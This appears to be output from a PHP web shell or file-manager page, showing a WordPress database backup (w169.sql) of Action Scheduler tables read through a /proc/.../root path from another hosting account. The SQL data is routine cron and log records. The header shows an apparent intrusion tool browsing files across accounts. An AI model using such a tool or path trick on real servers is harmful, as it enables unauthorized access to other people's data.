HEX
Server: Apache/2.4.58 (Ubuntu)
System: Linux host 6.8.0-107-generic #107-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 13 19:51:50 UTC 2026 x86_64
User: w230 (1248)
PHP: 8.3.6
Disabled: NONE
Upload Files
File: //proc/7195/root/backup/w169.sql
/*M!999999\- enable the sandbox mode */ 
-- MariaDB dump 10.19  Distrib 10.11.14-MariaDB, for debian-linux-gnu (x86_64)
--
-- Host: localhost    Database: w169
-- ------------------------------------------------------
-- Server version	10.11.14-MariaDB-0ubuntu0.24.04.1

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `wp_actionscheduler_actions`
--

DROP TABLE IF EXISTS `wp_actionscheduler_actions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_actionscheduler_actions` (
  `action_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `hook` varchar(191) NOT NULL,
  `status` varchar(20) NOT NULL,
  `scheduled_date_gmt` datetime DEFAULT '0000-00-00 00:00:00',
  `scheduled_date_local` datetime DEFAULT '0000-00-00 00:00:00',
  `priority` tinyint(3) unsigned NOT NULL DEFAULT 10,
  `args` varchar(191) DEFAULT NULL,
  `schedule` longtext DEFAULT NULL,
  `group_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `attempts` int(11) NOT NULL DEFAULT 0,
  `last_attempt_gmt` datetime DEFAULT '0000-00-00 00:00:00',
  `last_attempt_local` datetime DEFAULT '0000-00-00 00:00:00',
  `claim_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `extended_args` varchar(8000) DEFAULT NULL,
  PRIMARY KEY (`action_id`),
  KEY `hook_status_scheduled_date_gmt` (`hook`(163),`status`,`scheduled_date_gmt`),
  KEY `status_scheduled_date_gmt` (`status`,`scheduled_date_gmt`),
  KEY `scheduled_date_gmt` (`scheduled_date_gmt`),
  KEY `args` (`args`),
  KEY `group_id` (`group_id`),
  KEY `last_attempt_gmt` (`last_attempt_gmt`),
  KEY `claim_id_status_scheduled_date_gmt` (`claim_id`,`status`,`scheduled_date_gmt`)
) ENGINE=InnoDB AUTO_INCREMENT=31051 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_actionscheduler_actions`
--

LOCK TABLES `wp_actionscheduler_actions` WRITE;
/*!40000 ALTER TABLE `wp_actionscheduler_actions` DISABLE KEYS */;
INSERT INTO `wp_actionscheduler_actions` VALUES
(16263,'action_scheduler/migration_hook','failed','2025-07-16 02:46:42','2025-07-16 02:46:42',10,'[]','O:30:\"ActionScheduler_SimpleSchedule\":2:{s:22:\"\0*\0scheduled_timestamp\";i:1752634002;s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1752634002;}',1,1,'2025-07-16 02:47:09','2025-07-16 09:47:09',0,NULL),
(30779,'forminator_daily_cron','pending','2025-09-24 11:38:16','2025-09-24 11:38:16',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758713896;s:18:\"\0*\0first_timestamp\";i:1747804560;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758713896;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',3,0,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,NULL),
(30974,'forminator_action_scheduler_cleanup','complete','2025-09-24 07:10:34','2025-09-24 07:10:34',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758697834;s:18:\"\0*\0first_timestamp\";i:1747804560;s:13:\"\0*\0recurrence\";i:7200;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758697834;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:7200;}',3,1,'2025-09-24 07:29:29','2025-09-24 14:29:29',0,NULL),
(31008,'forminator_general_data_protection_cleanup','complete','2025-09-24 07:35:51','2025-09-24 07:35:51',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758699351;s:18:\"\0*\0first_timestamp\";i:1747804560;s:13:\"\0*\0recurrence\";i:3600;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758699351;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}',3,1,'2025-09-24 07:37:24','2025-09-24 14:37:24',0,NULL),
(31015,'forminator_send_export','complete','2025-09-24 07:30:29','2025-09-24 07:30:29',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758699029;s:18:\"\0*\0first_timestamp\";i:1747804560;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758699029;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',3,1,'2025-09-24 07:30:54','2025-09-24 14:30:54',0,NULL),
(31016,'forminator_process_report','complete','2025-09-24 07:30:29','2025-09-24 07:30:29',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758699029;s:18:\"\0*\0first_timestamp\";i:1753342118;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758699029;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',3,1,'2025-09-24 07:30:54','2025-09-24 14:30:54',0,NULL),
(31017,'forminator_action_scheduler_cleanup','pending','2025-09-24 09:29:29','2025-09-24 09:29:29',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758706169;s:18:\"\0*\0first_timestamp\";i:1747804560;s:13:\"\0*\0recurrence\";i:7200;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758706169;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:7200;}',3,0,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,NULL),
(31018,'forminator_send_export','complete','2025-09-24 07:31:54','2025-09-24 07:31:54',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758699114;s:18:\"\0*\0first_timestamp\";i:1747804560;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758699114;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',3,1,'2025-09-24 07:37:24','2025-09-24 14:37:24',0,NULL),
(31019,'forminator_process_report','complete','2025-09-24 07:31:54','2025-09-24 07:31:54',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758699114;s:18:\"\0*\0first_timestamp\";i:1753342118;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758699114;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',3,1,'2025-09-24 07:37:24','2025-09-24 14:37:24',0,NULL),
(31020,'forminator_send_export','complete','2025-09-24 07:38:24','2025-09-24 07:38:24',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758699504;s:18:\"\0*\0first_timestamp\";i:1747804560;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758699504;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',3,1,'2025-09-24 07:42:05','2025-09-24 14:42:05',0,NULL),
(31021,'forminator_process_report','complete','2025-09-24 07:38:24','2025-09-24 07:38:24',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758699504;s:18:\"\0*\0first_timestamp\";i:1753342118;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758699504;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',3,1,'2025-09-24 07:42:05','2025-09-24 14:42:05',0,NULL),
(31022,'forminator_general_data_protection_cleanup','pending','2025-09-24 08:37:24','2025-09-24 08:37:24',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758703044;s:18:\"\0*\0first_timestamp\";i:1747804560;s:13:\"\0*\0recurrence\";i:3600;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758703044;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}',3,0,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,NULL),
(31023,'forminator_send_export','complete','2025-09-24 07:43:05','2025-09-24 07:43:05',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758699785;s:18:\"\0*\0first_timestamp\";i:1747804560;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758699785;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',3,1,'2025-09-24 07:51:05','2025-09-24 14:51:05',0,NULL),
(31024,'forminator_process_report','complete','2025-09-24 07:43:05','2025-09-24 07:43:05',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758699785;s:18:\"\0*\0first_timestamp\";i:1753342118;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758699785;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',3,1,'2025-09-24 07:51:05','2025-09-24 14:51:05',0,NULL),
(31025,'forminator_send_export','complete','2025-09-24 07:52:05','2025-09-24 07:52:05',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758700325;s:18:\"\0*\0first_timestamp\";i:1747804560;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758700325;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',3,1,'2025-09-24 07:54:05','2025-09-24 14:54:05',0,NULL),
(31026,'forminator_process_report','complete','2025-09-24 07:52:05','2025-09-24 07:52:05',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758700325;s:18:\"\0*\0first_timestamp\";i:1753342118;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758700325;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',3,1,'2025-09-24 07:54:06','2025-09-24 14:54:06',0,NULL),
(31027,'forminator_send_export','complete','2025-09-24 07:55:05','2025-09-24 07:55:05',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758700505;s:18:\"\0*\0first_timestamp\";i:1747804560;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758700505;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',3,1,'2025-09-24 07:55:42','2025-09-24 14:55:42',0,NULL),
(31028,'forminator_process_report','complete','2025-09-24 07:55:06','2025-09-24 07:55:06',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758700506;s:18:\"\0*\0first_timestamp\";i:1753342118;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758700506;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',3,1,'2025-09-24 07:55:42','2025-09-24 14:55:42',0,NULL),
(31029,'forminator_send_export','complete','2025-09-24 07:56:42','2025-09-24 07:56:42',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758700602;s:18:\"\0*\0first_timestamp\";i:1747804560;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758700602;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',3,1,'2025-09-24 07:56:43','2025-09-24 14:56:43',0,NULL),
(31030,'forminator_process_report','complete','2025-09-24 07:56:42','2025-09-24 07:56:42',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758700602;s:18:\"\0*\0first_timestamp\";i:1753342118;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758700602;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',3,1,'2025-09-24 07:56:43','2025-09-24 14:56:43',0,NULL),
(31031,'forminator_send_export','complete','2025-09-24 07:57:43','2025-09-24 07:57:43',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758700663;s:18:\"\0*\0first_timestamp\";i:1747804560;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758700663;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',3,1,'2025-09-24 07:58:41','2025-09-24 14:58:41',0,NULL),
(31032,'forminator_process_report','complete','2025-09-24 07:57:43','2025-09-24 07:57:43',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758700663;s:18:\"\0*\0first_timestamp\";i:1753342118;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758700663;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',3,1,'2025-09-24 07:58:41','2025-09-24 14:58:41',0,NULL),
(31033,'forminator_send_export','complete','2025-09-24 07:59:41','2025-09-24 07:59:41',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758700781;s:18:\"\0*\0first_timestamp\";i:1747804560;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758700781;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',3,1,'2025-09-24 07:59:43','2025-09-24 14:59:43',0,NULL),
(31034,'forminator_process_report','complete','2025-09-24 07:59:41','2025-09-24 07:59:41',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758700781;s:18:\"\0*\0first_timestamp\";i:1753342118;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758700781;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',3,1,'2025-09-24 07:59:43','2025-09-24 14:59:43',0,NULL),
(31035,'forminator_send_export','complete','2025-09-24 08:00:43','2025-09-24 08:00:43',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758700843;s:18:\"\0*\0first_timestamp\";i:1747804560;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758700843;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',3,1,'2025-09-24 08:01:42','2025-09-24 15:01:42',0,NULL),
(31036,'forminator_process_report','complete','2025-09-24 08:00:43','2025-09-24 08:00:43',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758700843;s:18:\"\0*\0first_timestamp\";i:1753342118;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758700843;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',3,1,'2025-09-24 08:01:42','2025-09-24 15:01:42',0,NULL),
(31037,'forminator_send_export','complete','2025-09-24 08:02:42','2025-09-24 08:02:42',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758700962;s:18:\"\0*\0first_timestamp\";i:1747804560;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758700962;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',3,1,'2025-09-24 08:03:43','2025-09-24 15:03:43',0,NULL),
(31038,'forminator_process_report','complete','2025-09-24 08:02:42','2025-09-24 08:02:42',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758700962;s:18:\"\0*\0first_timestamp\";i:1753342118;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758700962;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',3,1,'2025-09-24 08:03:43','2025-09-24 15:03:43',0,NULL),
(31039,'forminator_send_export','complete','2025-09-24 08:04:43','2025-09-24 08:04:43',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758701083;s:18:\"\0*\0first_timestamp\";i:1747804560;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758701083;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',3,1,'2025-09-24 08:05:42','2025-09-24 15:05:42',0,NULL),
(31040,'forminator_process_report','complete','2025-09-24 08:04:43','2025-09-24 08:04:43',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758701083;s:18:\"\0*\0first_timestamp\";i:1753342118;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758701083;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',3,1,'2025-09-24 08:05:42','2025-09-24 15:05:42',0,NULL),
(31041,'forminator_send_export','complete','2025-09-24 08:06:42','2025-09-24 08:06:42',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758701202;s:18:\"\0*\0first_timestamp\";i:1747804560;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758701202;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',3,1,'2025-09-24 08:06:43','2025-09-24 15:06:43',0,NULL),
(31042,'forminator_process_report','complete','2025-09-24 08:06:42','2025-09-24 08:06:42',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758701202;s:18:\"\0*\0first_timestamp\";i:1753342118;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758701202;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',3,1,'2025-09-24 08:06:43','2025-09-24 15:06:43',0,NULL),
(31043,'forminator_send_export','complete','2025-09-24 08:07:43','2025-09-24 08:07:43',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758701263;s:18:\"\0*\0first_timestamp\";i:1747804560;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758701263;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',3,1,'2025-09-24 08:08:42','2025-09-24 15:08:42',0,NULL),
(31044,'forminator_process_report','complete','2025-09-24 08:07:43','2025-09-24 08:07:43',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758701263;s:18:\"\0*\0first_timestamp\";i:1753342118;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758701263;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',3,1,'2025-09-24 08:08:42','2025-09-24 15:08:42',0,NULL),
(31045,'forminator_send_export','complete','2025-09-24 08:09:42','2025-09-24 08:09:42',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758701382;s:18:\"\0*\0first_timestamp\";i:1747804560;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758701382;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',3,1,'2025-09-24 08:10:41','2025-09-24 15:10:41',0,NULL),
(31046,'forminator_process_report','complete','2025-09-24 08:09:42','2025-09-24 08:09:42',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758701382;s:18:\"\0*\0first_timestamp\";i:1753342118;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758701382;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',3,1,'2025-09-24 08:10:41','2025-09-24 15:10:41',0,NULL),
(31047,'forminator_send_export','complete','2025-09-24 08:11:41','2025-09-24 08:11:41',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758701501;s:18:\"\0*\0first_timestamp\";i:1747804560;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758701501;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',3,1,'2025-09-24 08:11:42','2025-09-24 15:11:42',0,NULL),
(31048,'forminator_process_report','complete','2025-09-24 08:11:41','2025-09-24 08:11:41',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758701501;s:18:\"\0*\0first_timestamp\";i:1753342118;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758701501;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',3,1,'2025-09-24 08:11:42','2025-09-24 15:11:42',0,NULL),
(31049,'forminator_send_export','pending','2025-09-24 08:12:42','2025-09-24 08:12:42',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758701562;s:18:\"\0*\0first_timestamp\";i:1747804560;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758701562;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',3,0,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,NULL),
(31050,'forminator_process_report','pending','2025-09-24 08:12:42','2025-09-24 08:12:42',10,'[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758701562;s:18:\"\0*\0first_timestamp\";i:1753342118;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758701562;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',3,0,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,NULL);
/*!40000 ALTER TABLE `wp_actionscheduler_actions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_actionscheduler_claims`
--

DROP TABLE IF EXISTS `wp_actionscheduler_claims`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_actionscheduler_claims` (
  `claim_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `date_created_gmt` datetime DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`claim_id`),
  KEY `date_created_gmt` (`date_created_gmt`)
) ENGINE=InnoDB AUTO_INCREMENT=13066 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_actionscheduler_claims`
--

LOCK TABLES `wp_actionscheduler_claims` WRITE;
/*!40000 ALTER TABLE `wp_actionscheduler_claims` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_actionscheduler_claims` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_actionscheduler_groups`
--

DROP TABLE IF EXISTS `wp_actionscheduler_groups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_actionscheduler_groups` (
  `group_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `slug` varchar(255) NOT NULL,
  PRIMARY KEY (`group_id`),
  KEY `slug` (`slug`(191))
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_actionscheduler_groups`
--

LOCK TABLES `wp_actionscheduler_groups` WRITE;
/*!40000 ALTER TABLE `wp_actionscheduler_groups` DISABLE KEYS */;
INSERT INTO `wp_actionscheduler_groups` VALUES
(1,'action-scheduler-migration'),
(2,'wpforms'),
(3,'forminator');
/*!40000 ALTER TABLE `wp_actionscheduler_groups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_actionscheduler_logs`
--

DROP TABLE IF EXISTS `wp_actionscheduler_logs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_actionscheduler_logs` (
  `log_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `action_id` bigint(20) unsigned NOT NULL,
  `message` text NOT NULL,
  `log_date_gmt` datetime DEFAULT '0000-00-00 00:00:00',
  `log_date_local` datetime DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`log_id`),
  KEY `action_id` (`action_id`),
  KEY `log_date_gmt` (`log_date_gmt`)
) ENGINE=InnoDB AUTO_INCREMENT=91705 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_actionscheduler_logs`
--

LOCK TABLES `wp_actionscheduler_logs` WRITE;
/*!40000 ALTER TABLE `wp_actionscheduler_logs` DISABLE KEYS */;
INSERT INTO `wp_actionscheduler_logs` VALUES
(47342,16263,'action created','2025-07-16 02:45:42','2025-07-16 02:45:42'),
(47349,16263,'action started via WP Cron','2025-07-16 02:47:09','2025-07-16 02:47:09'),
(47350,16263,'action failed via WP Cron: Scheduled action for action_scheduler/migration_hook will not be executed as no callbacks are registered.','2025-07-16 02:47:09','2025-07-16 02:47:09'),
(90891,30779,'action created','2025-09-23 11:38:16','2025-09-23 11:38:16'),
(91476,30974,'action created','2025-09-24 05:10:34','2025-09-24 05:10:34'),
(91578,31008,'action created','2025-09-24 06:35:51','2025-09-24 06:35:51'),
(91599,31015,'action created','2025-09-24 07:29:29','2025-09-24 07:29:29'),
(91602,31016,'action created','2025-09-24 07:29:29','2025-09-24 07:29:29'),
(91603,30974,'action started via WP Cron','2025-09-24 07:29:29','2025-09-24 07:29:29'),
(91604,30974,'action complete via WP Cron','2025-09-24 07:29:29','2025-09-24 07:29:29'),
(91605,31017,'action created','2025-09-24 07:29:29','2025-09-24 07:29:29'),
(91606,31015,'action started via WP Cron','2025-09-24 07:30:54','2025-09-24 07:30:54'),
(91607,31015,'action complete via WP Cron','2025-09-24 07:30:54','2025-09-24 07:30:54'),
(91608,31018,'action created','2025-09-24 07:30:54','2025-09-24 07:30:54'),
(91609,31016,'action started via WP Cron','2025-09-24 07:30:54','2025-09-24 07:30:54'),
(91610,31016,'action complete via WP Cron','2025-09-24 07:30:54','2025-09-24 07:30:54'),
(91611,31019,'action created','2025-09-24 07:30:54','2025-09-24 07:30:54'),
(91612,31018,'action started via WP Cron','2025-09-24 07:37:24','2025-09-24 07:37:24'),
